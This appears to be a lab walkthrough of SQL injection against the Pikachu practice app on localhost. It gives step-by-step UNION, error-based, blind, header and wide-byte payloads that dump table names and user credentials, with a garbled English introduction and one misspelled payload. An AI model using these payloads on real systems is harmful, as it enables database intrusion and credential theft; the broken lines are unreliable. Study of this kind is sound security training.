In owasp released top10 rankings, the injection vulnerability has been the number one hazard vulnerabilities, which bear the brunt of injection vulnerability injection vulnerability database.
A serious SQL injection vulnerability, could lead directly to a company go bankrupt!
SQL reason is mainly formed injection vulnerabilities in data exchange, data is passed to the front of the background process, do not judge strictly, leading to its incoming " data " spliced to SQL after statement, it is treated as SQL statements part of the execution. Resulting in damage to the database (to be Tuoku, it is deleted, or even the entire server permissions fall).
When building the code, usually from the following aspects of the strategy to prevent SQL injection vulnerability:
1. to pass into SQL statements inside the variable filter, do not allow incoming dangerous character;
2. the use of parametric ( Parameterized Query or Parameterized of Statement );
3. there is , there are many ORM framework will automatically use parameterized injection problems to solve , but it also provides a " mosaic " of the way , so be cautious when using !
Numeric injection ( POST )
Method One: Hand UNION joint inquiry injection
1. capture sent to the repeater module, respectively id = 1 back input and 1 = 1 and and 1 = 2
and 1 = 1 is not given
and 1 = 2 error
2.暴出字段数,order by 2未报错,order by 3报错,说明只有两个字段
3.用联合查询暴出位置,id为错误值,id=0 union select 1,2
4.暴出数据库名,
id=0 union select 1,database()
5.暴出表名,
id=0 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
6.管理员的账号密码可能在users表中,暴出列名,
id=0 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'
7.暴出值,
id=0 union select 1,group_concat(username,0x3a,password) from users
方法二:手工报错型注入
1.暴出库名,id为正确值,id=1 and extractvalue(1,concat(0x7e,(select database())))
2.暴出表名,
id=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))
3.暴出列名,
id=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')))
4.未完全显示,使用not in暴出未显示的
5.暴出值,
id=1 and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))),同理未显示的可以用not in暴出
方法三:自动注入sqlmap
不做累述。
字符型注入(get)
1.单引号测试,报错
http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=1'&submit=%E6%9F%A5%E8%AF%A2
2.添加注释符,未报错,确定为单引号字符型注入,
http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=1' --+&submit=%E6%9F%A5%E8%AF%A2
3.暴出字段数,order by 2未报错,order by 3报错,说明只有两个字段,
http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=1' order by 2 --+&submit=%E6%9F%A5%E8%AF%A2
4.爆出位置,
http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=1' union select 1,2 --+&submit=%E6%9F%A5%E8%AF%A2
5.暴出表名,
http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+&submit=%E6%9F%A5%E8%AF%A2
6.暴出字段,
http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' --+&submit=%E6%9F%A5%E8%AF%A2
7.暴出值,
http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=1' union select 1,group_concat(username,0x3a,password) from users --+&submit=%E6%9F%A5%E8%AF%A2
数字型注入(post)的方法二、三同样适用于本题
搜索型注入
1.原理分析
select username,id,email from member where username like '%$name%'
这句SLQ语句就是基于用户输入的name的值在表member中搜索匹配username,但是如果输入 'and 1=1 and '%'=' 就变成了
select username,id,email from member where username like '%$name'and 1=1 and '%'='%'
·搜索型注入的判断方法:
1 搜索keywords‘,如果出错的话,有90%的可能性存在漏洞;
2 搜索 keywords%,如果同样出错的话,就有95%的可能性存在漏洞;
3 搜索keywords% 'and 1=1 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=1)看返回的情况
4 搜索keywords% 'and 1=2 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=2)看返回的情况
5 根据两次的返回情况来判断是不是搜索型文本框注入了
·下面方法也可以测试
'and 1=1 and '%'='
%' and 1=1--'
%' and 1=1 and '%'='
2.判断是否可注入,尝试构造
http://127.0.0.1/pikachu/vul/sqli/sqli_search.php?name=0%' &submit=%E6%90%9C%E7%B4%A2,报错
http://127.0.0.1/pikachu/vul/sqli/sqli_search.php?name=0%' --+&submit=%E6%90%9C%E7%B4%A2,未报错
3.暴字段数,order by 3未报错
http://127.0.0.1/pikachu/vul/sqli/sqli_search.php?name=0%' order by 4 --+&submit=%E6%90%9C%E7%B4%A2
4.爆出位置,
http://127.0.0.1/pikachu/vul/sqli/sqli_search.php?name=0%' union select 1,2,3 --+&submit=%E6%90%9C%E7%B4%A2
5.暴出表名,
http://127.0.0.1/pikachu/vul/sqli/sqli_search.php?name=0%' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+&submit=%E6%90%9C%E7%B4%A2
6.暴出列名,
http://127.0.0.1/pikachu/vul/sqli/sqli_search.php?name=0%' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+&submit=%E6%90%9C%E7%B4%A2
7.暴出值,
http://127.0.0.1/pikachu/vul/sqli/sqli_search.php?name=0%' union select 1,2,group_concat(username,0x3a,password) from users --+&submit=%E6%90%9C%E7%B4%A2
xx型注入
1.先单引号测试判断,
http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0' &submit=%E6%9F%A5%E8%AF%A2#
2.报这样的错,尝试构造,
http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0') &submit=%E6%9F%A5%E8%AF%A2#,报错
http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0') --+&submit=%E6%9F%A5%E8%AF%A2#,未报错
3.判断字段数,order by 2未报错
http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0') order by 3--+&submit=%E6%9F%A5%E8%AF%A2#
4.爆出位置,
http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0') union select 1,2 --+&submit=%E6%9F%A5%E8%AF%A2#
5.暴出表名,
http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0') union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+&submit=%E6%9F%A5%E8%AF%A2#
6.暴出列名,
http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0') union select 1,group_concat(column_name) from information_schema.columns where table_name='users' --+&submit=%E6%9F%A5%E8%AF%A2#
7.暴出值,
http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0') union select 1,group_concat(username,0x3a,password) from users --+&submit=%E6%9F%A5%E8%AF%A2#
insert/update注入
1.用单引号判断,
2.存在注入,前面的单引号闭合前面的单引号,后面的单引号闭合后面的单引号,两个or之间就可以填入我们的代码,可以直接把报错的代码插入进去,暴出库名,
' or updatexml(1,concat(0x7e,(database())),0) or '
3.同理,暴出表,
' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),0) or '
4.暴出列名
' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),0) or '
5.暴出值
' or updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)),0) or '
delete注入
1.删除留言同时抓包,发送到repeater模块,可以在repeater里面的id进行闭合操作,因为它传的是个id是个 数字型,所以我们不需要用单引号进行闭合,
因为这个参数实在uil里面提交的,所以我们需要在burp上对这个payload做一个URL的编码
2.暴出库名,
id=63+or+updatexml(1,concat(0x7e,(select+database())),0)
3.暴出表名,
id=63+or+updatexml(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema%3ddatabase())),0)
4.暴出列名,
id=63+or+updatexml(1,concat(0x7e,(select+group_concat(column_name)+from+information_schema.columns+where+table_name%3d'users')),0)
5.暴出值,
id=63+or+updatexml(1,concat(0x7e,(select+group_concat(username,0x3a,password)+from+users)),0)
http header注入
1.输入数据查看,
2.抓包查看,发送到repeater模块,把Accept中的内容删掉,加上单引号测试,报错,说明可能有注入,
3.构造payload,暴出库名,
User-Agent: ' or updatexml(1,concat(0x7e,(select database())),0) or '
4.暴出表名,
User-Agent: ' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),0) or '
5.暴出列名,
User-Agent: ' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),0) or '
6.暴出值,
User-Agent: ' or updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)),0) or '
盲注(base on boolian)
1.基于布尔的盲注(boolean),判断,
kobe' and 1=1#
2.逐字节猜解,
报错:kobe' and ascii(substr(database(),1,1))>112#
未报错:kobe' and ascii(substr(database(),1,1))=112#
3.这样逐字节猜解库名、表名、列名和值,过于繁琐,建议使用工具。
盲注(base on time)
1.基于时间的盲注,判断,响应时间差不多五秒,存在注入,
kobe' and sleep(5)#
2.猜解暴库,
秒响应:kobe' and if((substr(databese(),1,1))='s',sleep(5),null)#
响应时间五秒:kobe' and if((substr(databese(),1,1))='p',sleep(5),null)#
说明库名第一个首字母为p
3.继续猜解,过于繁琐,建议使用工具
宽字节注入
1.在magic_quotes_gpc=On的情况下,提交的参数中如果带有单引号’,就会被自动转义\’,使很多注入攻击无效,
GBK双字节编码:一个汉字用两个字节表示,首字节对应0×81-0xFE,尾字节对应0×40-0xFE(除0×7F),刚好涵盖了转义符号对应的编码0×5C。
0xD50×5C 对应了汉字“诚”,URL编码用百分号加字符的16进制编码表示字符,于是 %d5%5c 经URL解码后为“诚”。
2.输入%d5',报错,存在宽字节注入,
3.暴字段位数,order by 2未报错,order by 3报错,存在两个字段,
4.爆出位置,
name=1%d5' union select 1,2 --+
5.暴出表名,
name=1%d5' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+
6.暴出列名,table_name='users' 也存在单引号,需要把users十六进制编码0x7573657273,
name=1%d5' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+
7.暴出值,
name=1%d5' union select 1,group_concat(username,0x3a,password) from users --+
